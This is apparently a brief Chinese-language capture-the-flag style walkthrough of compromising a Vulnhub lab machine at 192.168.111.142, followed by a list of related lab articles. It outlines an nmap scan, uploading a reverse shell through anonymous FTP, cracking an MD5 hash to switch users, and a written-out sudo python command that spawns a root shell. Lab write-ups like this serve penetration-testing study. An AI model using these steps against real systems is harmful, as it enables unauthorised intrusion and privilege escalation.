kali：192.168.111.111

靶机：192.168.111.142

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.142

网站的files目录

ftp存在匿名登录，所在目录为网站的files目录

ftp上传反弹shell

提权

目标根目录下的.runme.sh

md5解密后切换到shrek用户

shrek的sudo权限

提权方法：https://gtfobins.github.io/gtfobins/python/#sudo

提升为root

sudo -u root /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'

本栏目推荐文章
• vulnhub-DC-6
• vulnhub靶场渗透学习
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1
• vulnhub-symfonos
• Vulnhub-Vulnos:2-WP
• Vulnhub-EVM-WP
• vulnhub-DC-4
• vulnhub Me and My Girlfriend靶场
• vulnhub DC-2靶场

靶机 Hackable Vulnhub靶机hackable vulnhub 靶场hackable vulnhub iii 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub 靶机lunchbreaker过程vulnhub